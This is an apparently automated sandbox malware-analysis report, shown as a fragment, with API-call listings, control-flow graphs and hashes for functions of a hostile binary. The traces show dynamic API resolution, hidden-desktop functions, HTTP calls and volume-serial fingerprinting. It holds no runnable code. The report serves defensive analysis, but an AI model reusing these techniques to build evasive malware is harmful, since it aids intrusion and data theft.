                                • GetProcAddress.KERNEL32(77190000,016CD400), ref: 00E668C3
                                • GetProcAddress.KERNEL32(77190000,016CD430), ref: 00E668DC
                                • GetProcAddress.KERNEL32(77190000,016CD310), ref: 00E668F4
                                • GetProcAddress.KERNEL32(77190000,016CD160), ref: 00E6690C
                                • GetProcAddress.KERNEL32(77190000,016B55A8), ref: 00E66925
                                • GetProcAddress.KERNEL32(77190000,016CD178), ref: 00E6693D
                                • GetProcAddress.KERNEL32(77190000,016CD418), ref: 00E66955
                                • GetProcAddress.KERNEL32(77190000,016CD2E0), ref: 00E6696E
                                • GetProcAddress.KERNEL32(77190000,016CD238), ref: 00E66986
                                • GetProcAddress.KERNEL32(77190000,016CD3B8), ref: 00E6699E
                                • GetProcAddress.KERNEL32(77190000,016CD250), ref: 00E669B7
                                • GetProcAddress.KERNEL32(77190000,016CD2B0), ref: 00E669CF
                                • GetProcAddress.KERNEL32(77190000,016CD1C0), ref: 00E669E7
                                • GetProcAddress.KERNEL32(77190000,016CD1D8), ref: 00E66A00
                                • GetProcAddress.KERNEL32(77190000,016BFDD8), ref: 00E66A18
                                • GetProcAddress.KERNEL32(77190000,016CD1F0), ref: 00E66A30
                                • GetProcAddress.KERNEL32(77190000,016CD268), ref: 00E66A49
                                • GetProcAddress.KERNEL32(77190000,016B55C8), ref: 00E66A61
                                • GetProcAddress.KERNEL32(77190000,016CD280), ref: 00E66A79
                                • GetProcAddress.KERNEL32(77190000,016B55E8), ref: 00E66A92
                                • GetProcAddress.KERNEL32(77190000,016CD2C8), ref: 00E66AAA
                                • GetProcAddress.KERNEL32(77190000,016CD2F8), ref: 00E66AC2
                                • GetProcAddress.KERNEL32(77190000,016B5428), ref: 00E66ADB
                                • GetProcAddress.KERNEL32(77190000,016B5608), ref: 00E66AF3
                                • LoadLibraryA.KERNEL32(016CD388,00E6051F), ref: 00E66B05
                                • LoadLibraryA.KERNEL32(016CD328), ref: 00E66B16
                                • LoadLibraryA.KERNEL32(016CD340), ref: 00E66B28
                                • LoadLibraryA.KERNEL32(016CD358), ref: 00E66B3A
                                • LoadLibraryA.KERNEL32(016CD370), ref: 00E66B4B
                                • LoadLibraryA.KERNEL32(016CD3A0), ref: 00E66B5D
                                • LoadLibraryA.KERNEL32(016CD3D0), ref: 00E66B6F
                                • LoadLibraryA.KERNEL32(016CD448), ref: 00E66B80
                                • GetProcAddress.KERNEL32(77040000,016B5328), ref: 00E66B9C
                                • GetProcAddress.KERNEL32(77040000,016CD580), ref: 00E66BB4
                                • GetProcAddress.KERNEL32(77040000,016C8AF8), ref: 00E66BCD
                                • GetProcAddress.KERNEL32(77040000,016CD688), ref: 00E66BE5
                                • GetProcAddress.KERNEL32(77040000,016B5228), ref: 00E66BFD
                                • GetProcAddress.KERNEL32(73D20000,016BA708), ref: 00E66C1D
                                • GetProcAddress.KERNEL32(73D20000,016B5368), ref: 00E66C35
                                • GetProcAddress.KERNEL32(73D20000,016BA730), ref: 00E66C4E
                                • GetProcAddress.KERNEL32(73D20000,016CD568), ref: 00E66C66
                                • GetProcAddress.KERNEL32(73D20000,016CD4A8), ref: 00E66C7E
                                • GetProcAddress.KERNEL32(73D20000,016B4F88), ref: 00E66C97
                                • GetProcAddress.KERNEL32(73D20000,016B5268), ref: 00E66CAF
                                • GetProcAddress.KERNEL32(73D20000,016CD640), ref: 00E66CC7
                                • GetProcAddress.KERNEL32(768D0000,016B50A8), ref: 00E66CE3
                                • GetProcAddress.KERNEL32(768D0000,016B52A8), ref: 00E66CFB
                                • GetProcAddress.KERNEL32(768D0000,016CD658), ref: 00E66D14
                                • GetProcAddress.KERNEL32(768D0000,016CD4F0), ref: 00E66D2C
                                • GetProcAddress.KERNEL32(768D0000,016B4FA8), ref: 00E66D44
                                • GetProcAddress.KERNEL32(75790000,016BA550), ref: 00E66D64
                                • GetProcAddress.KERNEL32(75790000,016BA6B8), ref: 00E66D7C
                                • GetProcAddress.KERNEL32(75790000,016CD460), ref: 00E66D95
                                • GetProcAddress.KERNEL32(75790000,016B50C8), ref: 00E66DAD
                                • GetProcAddress.KERNEL32(75790000,016B5288), ref: 00E66DC5
                                • GetProcAddress.KERNEL32(75790000,016BA528), ref: 00E66DDE
                                • GetProcAddress.KERNEL32(75A10000,016CD478), ref: 00E66DFE
                                • GetProcAddress.KERNEL32(75A10000,016B5308), ref: 00E66E16
                                • GetProcAddress.KERNEL32(75A10000,016C8B98), ref: 00E66E2F
                                • GetProcAddress.KERNEL32(75A10000,016CD490), ref: 00E66E47
                                • GetProcAddress.KERNEL32(75A10000,016CD670), ref: 00E66E5F
                                • GetProcAddress.KERNEL32(75A10000,016B5248), ref: 00E66E78
                                • GetProcAddress.KERNEL32(75A10000,016B5068), ref: 00E66E90
                                • GetProcAddress.KERNEL32(75A10000,016CD598), ref: 00E66EA8
                                • GetProcAddress.KERNEL32(75A10000,016CD4C0), ref: 00E66EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00E66ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00E66EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00E66F05
                                • GetProcAddress.KERNEL32(76850000,016B50E8), ref: 00E66F21
                                • GetProcAddress.KERNEL32(76850000,016CD6A0), ref: 00E66F39
                                • GetProcAddress.KERNEL32(76850000,016CD4D8), ref: 00E66F52
                                • GetProcAddress.KERNEL32(76850000,016CD508), ref: 00E66F6A
                                • GetProcAddress.KERNEL32(76850000,016CD5E0), ref: 00E66F82
                                • GetProcAddress.KERNEL32(75690000,016B5088), ref: 00E66F9E
                                • GetProcAddress.KERNEL32(75690000,016B5108), ref: 00E66FB6
                                • GetProcAddress.KERNEL32(769C0000,016B52E8), ref: 00E66FD2
                                • GetProcAddress.KERNEL32(769C0000,016CD700), ref: 00E66FEA
                                • GetProcAddress.KERNEL32(6F8C0000,016B5348), ref: 00E6700A
                                • GetProcAddress.KERNEL32(6F8C0000,016B52C8), ref: 00E67022
                                • GetProcAddress.KERNEL32(6F8C0000,016B5128), ref: 00E6703B
                                • GetProcAddress.KERNEL32(6F8C0000,016CD5B0), ref: 00E67053
                                • GetProcAddress.KERNEL32(6F8C0000,016B5188), ref: 00E6706B
                                • GetProcAddress.KERNEL32(6F8C0000,016B5148), ref: 00E67084
                                • GetProcAddress.KERNEL32(6F8C0000,016B4FC8), ref: 00E6709C
                                • GetProcAddress.KERNEL32(6F8C0000,016B5168), ref: 00E670B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00E670CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00E670E2
                                • GetProcAddress.KERNEL32(75D90000,016CD5C8), ref: 00E670FE
                                • GetProcAddress.KERNEL32(75D90000,016C8C18), ref: 00E67116
                                • GetProcAddress.KERNEL32(75D90000,016CD520), ref: 00E6712F
                                • GetProcAddress.KERNEL32(75D90000,016CD5F8), ref: 00E67147
                                • GetProcAddress.KERNEL32(76470000,016B51A8), ref: 00E67163
                                • GetProcAddress.KERNEL32(6D7A0000,016CD538), ref: 00E6717F
                                • GetProcAddress.KERNEL32(6D7A0000,016B4FE8), ref: 00E67197
                                • GetProcAddress.KERNEL32(6D7A0000,016CD550), ref: 00E671B0
                                • GetProcAddress.KERNEL32(6D7A0000,016CD730), ref: 00E671C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 7c749b0fe7a1735e13921babf1369be8564fbdb5d6af8902953f4143bde2a739
                                • Instruction ID: 14162606d5f276fe800d35f6adc5f1bacfc084f68fff02ded661d8aacf48c934
                                • Opcode Fuzzy Hash: 7c749b0fe7a1735e13921babf1369be8564fbdb5d6af8902953f4143bde2a739
                                • Instruction Fuzzy Hash: 266233B5E602049FD775DF64E84CA2637B9F788329314891AF9D5A334CD73E9800DBA0
                                Function 00E5F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E5F1D5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F1F1
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E5F1FC
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F215
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E5F220
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F239
                                • lstrcpy.KERNEL32(00000000,00E74FA0), ref: 00E5F25E
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F28C
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F2C0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F2F0
                                • lstrlen.KERNEL32(016B56C8), ref: 00E5F315
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 9bfe10d1a43f994d116b8ef5af94820f2787f5203cfa9528545d05960cea0624
                                • Instruction ID: 9258acabadf697401c479f3169ea175d4a1d7d85cec21fed43e196d5a46f5d8f
                                • Opcode Fuzzy Hash: 9bfe10d1a43f994d116b8ef5af94820f2787f5203cfa9528545d05960cea0624
                                • Instruction Fuzzy Hash: CEA26B70A012019FCB20EF68E848A5ABBF5AF44319F18A87DE849FB355EB35DC45CB50
                                Function 00E5FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60013
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E600BD
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E600E1
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E600EC
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60110
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E6011B
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6013F
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E6015A
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60189
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E60194
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E601C3
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E601CE
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60206
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E60250
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60288
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E6059B
                                • lstrlen.KERNEL32(016B5528), ref: 00E605AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E605D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00E605E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6060E
                                • lstrlen.KERNEL32(016CEDC8), ref: 00E60625
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E6064C
                                • lstrcat.KERNEL32(00000000,?), ref: 00E60658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E60681
                                • lstrlen.KERNEL32(016B5648), ref: 00E60698
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E606C9
                                • lstrcat.KERNEL32(00000000,?), ref: 00E606D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E60706
                                • lstrcpy.KERNEL32(00000000,016C8C78), ref: 00E6074B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E6077F
                                • lstrcpy.KERNEL32(00000000,016CEED0), ref: 00E607E7
                                • lstrcpy.KERNEL32(00000000,016C8908), ref: 00E60858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 00E608CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E60928
                                • lstrcpy.KERNEL32(00000000,016C88F8), ref: 00E609F8
                                  • Part of subcall function 00E424E0: lstrcpy.KERNEL32(00000000,?), ref: 00E42528
                                  • Part of subcall function 00E424E0: lstrcpy.KERNEL32(00000000,?), ref: 00E4254E
                                  • Part of subcall function 00E424E0: lstrcpy.KERNEL32(00000000,?), ref: 00E42577
                                • lstrcpy.KERNEL32(00000000,016C8A28), ref: 00E60ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E60B81
                                • lstrcpy.KERNEL32(00000000,016C8A28), ref: 00E60D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 387884d6d97963c93457fd94637d6d06f66790881665b4e880cdcf43194b2208
                                • Instruction ID: 766b5f1bec96c7b317e0afc40159f62166f3884177b7d45085252775541a9739
                                • Opcode Fuzzy Hash: 387884d6d97963c93457fd94637d6d06f66790881665b4e880cdcf43194b2208
                                • Instruction Fuzzy Hash: 6CE28F70A453408FC734DF29E488B5ABBE0BF88358F5895ADE48DAB352DB35D841CB52
                                Function 00E5F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(016B56C8), ref: 00E5F315
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F47B
                                • lstrcpy.KERNEL32(00000000,016B56C8), ref: 00E5F4BB
                                • lstrcpy.KERNEL32(00000000,016C8BF8), ref: 00E5F4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E5F61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E5F718
                                • lstrlen.KERNEL32(016C8AC8), ref: 00E5F746
                                • lstrcpy.KERNEL32(00000000,016C8AC8), ref: 00E5F771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F793
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E5FA32
                                • lstrlen.KERNEL32(016C8B18), ref: 00E5FA60
                                • lstrcpy.KERNEL32(00000000,016C8B18), ref: 00E5FA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5FAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5FAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 3905298fab7d4039c015ae8a5006722565924ce8b740501581da9815724d6383
                                • Instruction ID: 08c181f05d8b9d8b3f7b6dc001cc16d557511b00d4c5c622a56a13bc578dd5ed
                                • Opcode Fuzzy Hash: 3905298fab7d4039c015ae8a5006722565924ce8b740501581da9815724d6383
                                • Instruction Fuzzy Hash: A2F13870A01201CFDB24DF29D448A69B7F5BF4431AB18D8BED849AB396E736DC46CB50
                                Function 00E58CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 e58ca0-e58cc4 StrCmpCA 2722 e58cc6-e58cc7 ExitProcess 2721->2722 2723 e58ccd-e58ce6 2721->2723 2725 e58ee2-e58eef call e42a20 2723->2725 2726 e58cec-e58cf1 2723->2726 2728 e58cf6-e58cf9 2726->2728 2730 e58ec3-e58edc 2728->2730 2731 e58cff 2728->2731 2730->2725 2770 e58cf3 2730->2770 2732 e58d84-e58d92 StrCmpCA 2731->2732 2733 e58da4-e58db8 StrCmpCA 2731->2733 2734 e58d06-e58d15 lstrlen 2731->2734 2735 e58e6f-e58e7d StrCmpCA 2731->2735 2736 e58e88-e58e9a lstrlen 2731->2736 2737 e58e56-e58e64 StrCmpCA 2731->2737 2738 e58d30-e58d3f lstrlen 2731->2738 2739 e58dbd-e58dcb StrCmpCA 2731->2739 2740 e58ddd-e58deb StrCmpCA 2731->2740 2741 e58dfd-e58e0b StrCmpCA 2731->2741 2742 e58e1d-e58e2b StrCmpCA 2731->2742 2743 e58e3d-e58e4b StrCmpCA 2731->2743 2744 e58d5a-e58d69 lstrlen 2731->2744 2732->2730 2757 e58d98-e58d9f 2732->2757 2733->2730 2745 e58d17-e58d1c call e42a20 2734->2745 2746 e58d1f-e58d2b call e42930 2734->2746 2735->2730 2749 e58e7f-e58e86 2735->2749 2750 e58ea4-e58eb0 call e42930 2736->2750 2751 e58e9c-e58ea1 call e42a20 2736->2751 2737->2730 2748 e58e66-e58e6d 2737->2748 2752 e58d41-e58d46 call e42a20 2738->2752 2753 e58d49-e58d55 call e42930 2738->2753 2739->2730 2758 e58dd1-e58dd8 2739->2758 2740->2730 2759 e58df1-e58df8 2740->2759 2741->2730 2760 e58e11-e58e18 2741->2760 2742->2730 2761 e58e31-e58e38 2742->2761 2743->2730 2747 e58e4d-e58e54 2743->2747 2754 e58d73-e58d7f call e42930 2744->2754 2755 e58d6b-e58d70 call e42a20 2744->2755 2745->2746 2779 e58eb3-e58eb5 2746->2779 2747->2730 2748->2730 2749->2730 2750->2779 2751->2750 2752->2753 2753->2779 2754->2779 2755->2754 2757->2730 2758->2730 2759->2730 2760->2730 2761->2730 2770->2728 2779->2730 2780 e58eb7-e58eb9 2779->2780 2780->2730 2781 e58ebb-e58ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: fe9baf29b13ba8c94b7cfc44c5ff2a2d608db1eafca2173b763f376672b90dd8
                                • Instruction ID: 32df71387f190472c06d5c579c21eea9573797e4d06582dead975ade5246eff0
                                • Opcode Fuzzy Hash: fe9baf29b13ba8c94b7cfc44c5ff2a2d608db1eafca2173b763f376672b90dd8
                                • Instruction Fuzzy Hash: 3F51B070900301AFC7219F75DE89A6BB7F4BB04709B00AC1DFA82F2640DF78E8458B61
                                Function 00E62740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 e62740-e62783 GetWindowsDirectoryA 2783 e62785 2782->2783 2784 e6278c-e627ea GetVolumeInformationA 2782->2784 2783->2784 2785 e627ec-e627f2 2784->2785 2786 e627f4-e62807 2785->2786 2787 e62809-e62820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 e62826-e62844 wsprintfA 2787->2788 2789 e62822-e62824 2787->2789 2790 e6285b-e62872 call e671e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00E6277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00E593B6,00000000,00000000,00000000,00000000), ref: 00E627AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E6280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62816
                                • wsprintfA.USER32 ref: 00E6283B
                                Strings
                                Memory Dump Source
